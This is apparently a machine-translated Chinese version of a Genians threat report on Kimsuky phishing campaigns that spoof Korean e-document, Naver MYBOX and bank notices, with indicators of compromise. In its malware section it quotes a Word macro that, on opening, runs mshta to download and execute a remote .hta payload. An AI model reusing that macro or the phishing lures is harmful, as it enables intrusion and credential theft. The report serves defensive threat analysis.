1. 概述
○ 正如许多人所知,电子邮件网络钓鱼在世界各地不断被报道,并且是威胁行为者选择的最流行的攻击之一。有人说,如果收件箱中收到的电子邮件中不包含恶意文件(恶意软件),则很难检测来自 URL 网络钓鱼方法的威胁。
○ 诱导 URL 点击的经典网络钓鱼攻击有时被视为传统威胁,并且其风险级别被“贬值”。然而,难以忽视的事实是,在韩国发现的许多 URL 网络钓鱼攻击中都包含 Kimsuky 组织。
○ 公司和组织的安全经理可以通过保护基于场景的网络钓鱼妥协指标 (IoC) 数据并将其注册到端点检测和响应 (EDR)产品的安全规则中来管理最初涌入的威胁。
○ 本报告研究了金秀基集团攻击者的每个实际案例的特征,深入了解并制定网络钓鱼应对计划,以避免遭受类似威胁。
2. 背景
○ 2023年10月,韩国发现多起网络钓鱼攻击。其中,伪装成电子文件公务员“国家秘书”新通知到来的网络钓鱼攻击接连被发现。
[
【图1】“国家秘书”电子文档欺骗攻击案例
○ 从发件人姓名中的源地址来看,使用了日本著名互联网服务提供商的域名[Biglobe / 'biglobe.ne[.]jp']。
○ 此外,被用作钓鱼地址的“电子文档主页”按钮中,有由韩国免费域名注册服务“MyDomain[.]Korea”提供的地址“National Secretary.Main[.]Korea”,被滥用为钓鱼网站地点。
○ 除了上例中说明的冒充“国家秘书”之外,类似的冒充“门户公司电子邮件安全管理员”或其他“公共机构电子文件”的案例还有很多。
![[그림 2] 유사 공격 사례 비교 모습](https://www.genians.co.kr/hs-fs/hubfs/%5B%EA%B7%B8%EB%A6%BC%202%5D%20%EC%9C%A0%EC%82%AC%20%EA%B3%B5%EA%B2%A9%20%EC%82%AC%EB%A1%80%20%EB%B9%84%EA%B5%90%20%EB%AA%A8%EC%8A%B5.png?width=800&height=511&name=%5B%EA%B7%B8%EB%A6%BC%202%5D%20%EC%9C%A0%EC%82%AC%20%EA%B3%B5%EA%B2%A9%20%EC%82%AC%EB%A1%80%20%EB%B9%84%EA%B5%90%20%EB%AA%A8%EC%8A%B5.png)
【图2】类似攻击案例对比
○ 在这些案例中,共同的源地址是日本的“Big Rob”服务,钓鱼链接是“My Domain[.]韩国”提供的域名地址。作为参考,可在“My Domain[.]kr”注册的域名列表如下,并且可能会根据所提供的服务而变化。
- 韩国域名
- .主要[.]韩国
- .社区[.]韩国
- .server[.]韩国
- .在线[.]韩国
- .主页[.]韩国
- .博客[.]韩国
- .Web[.]韩国
- 通用域
- .pe[.]kr
- .或[.]kr
- .ne[.]kr
- .re[.]kr
- .kro[.]kr
○ 当然,威胁行为者不仅仅使用日本电子邮件服务进行网络钓鱼攻击。我也经常使用韩国电子邮件服务。然而,“My Domain[.]韩国”服务不断在网络钓鱼网站上使用。
[图3]使用韩国电子邮件服务的攻击案例
○ 此类 URL 网络钓鱼攻击持续不断,威胁者冒充门户公司的通知或各种电子文档。
3. 威胁流分析
○ 冒充Naver MYBOX主题的网络钓鱼攻击以多种形式进行。让我们将其与时间表进行比较。 2024 年 4 月,使用了之前描述的日本 Big Lobe 源和美国域名“nsec[.]com”。
【图4】MYBOX主题钓鱼攻击流程图
○ 5月至9月初,以韩国的“cafe24[.]com”服务为起点。然后,从 9 月中旬开始,俄罗斯域名“mmbox[.]ru”开始被视为来源。 10 月,另一个“ncloud[.]ru”域被确定为网络钓鱼攻击电子邮件的来源。
○ 然而,此处确定的两个俄罗斯域名都是捏造的。它是通过网络钓鱼电子邮件发件人“star 3.0”错误注册和使用的。
○ 每个网络钓鱼命令和控制 (C2) 服务器最初主要使用英国 IP 地址,6 月份,通过 LRL 缩短 URL 服务隐藏了“covd.2kool4u[.]net”地址。从更改俄罗斯来源后,域名将更改为“My Domain[.]Korea”。
[图5]钓鱼邮件画面对比
○ 用于窃取电子邮件密码的钓鱼网站地址如下。
- MYBOX安全警示迷彩C2地址
- ned.kesug[.]com (185.27.134[.]201 / 185.27.134[.]144[GB])
- Online.Korea.article-com[.]eu (185.105.33[.]106 [GB])
- wud.wuaze[.]com (185.27.134[.]140 [GB])
- covd.2kool4u[.]net (185.27.134[.]93 [GB])
- owna.loveslife[.]biz (185.27.134[.]120 [GB])
- nidiogln.ne[.]kr
- naverbox.pe[.]kr
4. 钓鱼邮件发件人
○ 此前介绍的带有虚假俄罗斯源地址的钓鱼攻击邮件,采用了通过在标题和正文中进行欺骗来刺激焦虑的策略,就好像在 MYBOX 云服务中检测到了恶意活动一样。如果您分析电子邮件的内部代码,您可以看到使用“evangelia[.]edu”网站发送该电子邮件的痕迹。
[图6]带有俄罗斯电子邮件地址的内幕信息
○ 作为参考,福音派大学(“evangelia[.]edu”)是一所美国私立大学,以神学和基督教教育为主,“引进一位前韩国传教士担任校长”。
○ 在福音派大学网站上有一个可以实际发送钓鱼邮件的邮件程序,其标题为“star 3.0”。
○ 对于“mmbox[.]ru”和“ncloud[.]ru”域,发件人地址被操纵并通过相应的邮件程序发送。事实上,它是从韩国发出的,而不是美国或俄罗斯,并通过“明星3.0”邮件程序使用了俄罗斯伪装策略。然而,在未来,许多类型的电子文档模拟都使用实际的俄罗斯电子邮件服务(“mail[.]ru”)。
[图7]福音大学网站隐藏的电子邮件发件人
○ 大学网站上发现的钓鱼邮件发送程序已被公开。
○美国安全公司“Proofpoint”威胁:与朝鲜结盟的 TA406 诈骗、间谍和盗窃于 2021 年 11 月 18 日通过《三重
○ “Proofpoint”解释了被归类为朝鲜幕后黑手的“TA406”威胁行为者与 Kimsuky 集团的关系,并描述了“TA406”、“TA408”和“TA427”的内容。
○ 在报告第17页,存在在福音派大学发现的“星星3.0”屏幕。
【图8】‘Proofpoint’分析报告中介绍的邮件发送者
○ 另外,在金寿喜的竞选活动中,存在将“evangelia[.]edu”网站用作指挥控制(C2)服务器的情况。
○ 2019 年 7 月 23 日, MS Word DOC 类型文档文件在 Google 运营的“VirusTotal”服务中注册。该文档包含特定的宏命令,是 Kim Suki 组织的典型恶意软件类型。
| 属性 VB_Name = "NewMacros" <br> <br>Sub autoopen() <br>Shell ("mshta.exe https://evangelia[.]edu/image/bin/Rjboi0.hta") <br>End Sub |
○ 病毒总数屏幕上的文件名为“1.doc”,某些反恶意软件服务的检测名称包含关键字“Kimsuky”。并且有很多变体。
[图9]病毒总登记界面
○ 恶意文件包含文档创建者和修改者名称的“windowsmb”帐户名。 East Security 的报告《针对韩国和美国的 APT 活动,“烟幕”Kimsuky 透露(外包攻击) 》中详细介绍了相同的帐户名。
5. 来自俄罗斯的钓鱼邮件
○ 与上述 MYBOX 事件一样,截至 9 月初,网络钓鱼电子邮件主要通过日本和韩国的电子邮件服务发送。然后,从9月中旬开始,观察到一些伪装成从俄罗斯发送的网络钓鱼电子邮件。
○ 10月份,我们观察到许多案件伪装成金融机构发送的电子文件,但在这起案件中,这些信息实际上是通过俄罗斯电子邮件服务发送的。
【图10】某金融机构电子单据冒充案例
○ 对于电子文档主题,实际设计是被盗的,因此收件人可能不会产生怀疑。但是,如果您仔细查看“发件人”电子邮件地址,您会立即感到可疑,因为它包含俄罗斯 (RU) 域。
○ 除了冒充金融机构外,还存在伪装成门户公司博客客户中心发送消息的情况。威胁行为者可以使用各种内容来误导收件人。
[图11]某金融机构电子文件冒充案例
○ 使用俄罗斯电子邮件发件人的国内网络钓鱼案件并不常见。相反,收件人的怀疑程度可能会增加,从而降低网络钓鱼成功的可能性。然而,威胁行为者使用各种攻击策略,并可以利用它们来逃避检测。
| 源域 | 命令控制部分(C2)地址 | 伪装策略 |
| 收件箱[.] ru | 付款到期日-通知信息-Notice.Online[.]Korea | 韩国金融机构 |
| 列表[.] ru | 金融支付-指南-文件-Confirmation.Web[.]韩国 | 韩国金融机构 |
| 互联网[.] ru | 国家纳税期限-通知-信息-信息-确认.在线[.]韩国 | 韩国金融机构 |
| 邮件[.] ru | 国税厅-纳税期限-变更通知.re[.]kr | 韩国金融机构 |
| 互联网[.] ru | Naver-博客-帖子-限制-Guide.kro[.]kr | 韩国博客客户中心 |
○ 作为参考,俄罗斯的“mail[.]ru”服务允许您在注册过程中随机选择 5 个域名。该威胁参与者使用此函数来更改发送地址。
[图11-1]注册俄罗斯‘mail[.]ru’时提供的域名列表
六、结论与回应
○ 不发送恶意文件的金寿喜集团的网络钓鱼活动不断发生。有些人认为风险较低,因为不存在恶意文件。然而,这些网络钓鱼活动除了监视受害者的私生活外,还可以用作另一个渗透渠道。
○ 窃取受害者的帐户可能会导致随后对熟人或同事的攻击。特别是,由于冒充金融机构发送的正式文件而不会引起怀疑,因此需要特别注意。为了防止此类网络钓鱼并防止造成损害,您必须仔细检查发件人是否拥有官方电子邮件地址。
○ 当然,技术上可以像官方地址一样创建一个电子邮件地址并发送,因此尽可能努力核实事实比无条件信任更重要。
○ Genian EDR管理员可以使用公开可用的妥协指标 (IoC) 来检查恶意地址的访问历史记录,并根据需要另外管理检测策略。
[图12] Genian EDR检测到恶意IP地址的屏幕
○ 当终端用户访问EDR管理员注册的恶意站点IP地址时,可以根据响应策略条件进行内容投递。
【图13】Genian EDR用户检测威胁通知界面
○ 您可以通过基本信息查询查看检测历史详情,并为相关终端制定威胁应对策略。
[图14]恶意IP检测基本信息查询界面
7. 妥协指标
● MD5
adb30d4dd9e1bbe82392b4c01f561e46
b591cbd3f585dbb1b55f243d5a5982bc
d8249f33e07479ce9c0e44be73d3deac
0def51118a28987a929ba26c7413da29
2ff911b042e5d94dd78f744109851326
3cd67d99bcc8f3b959c255c9e8702e9f
6ead104743be6575e767986a71cf4bd9
7ca1a603a7440f1031c666afbe44afc8
658a8856d48aabc0ecfeb685d836621b
a6588c10d9c4c2b3837cd7ce6c43f72e
a75196b7629e3af03056c75af37f37cf
aa41e4883a9c5c91cdab225a0e82d86a
ab75a54c3d6ed01ba9478d9fecd443af
● C2
cookiemanager.n-e[.]kr
nidiogln.n-e[.]kr
naverbox.p-e[.]kr
covd.2kool4u[.]net
ned.kesug[.]com
wud.wuaze[.]com
owna.loveslife[.]biz
온라인.한국.article-com[.]eu
evangelia[.]edu
국민비서.메인[.]한국
국민연금공단.서버[.]한국
국민비서.커뮤니티[.]한국
국민건강보험공단.확인.서버[.]한국
납부기한-통지안내-고지.온라인[.]한국
금융결제-안내-문서-확인.웹[.]한국
국세-납부기한-통지-안내-안내-확인.온라인[.]한국
국세청-납부기한-변동안내문.r-e[.]kr
네이버-블로그-게시글-제한-안내.kro[.]kr
185.27.134[.]201
185.105.33[.]106
185.27.134[.]140
185.27.134[.]93
185.27.134[.]120
185.27.134[.]144
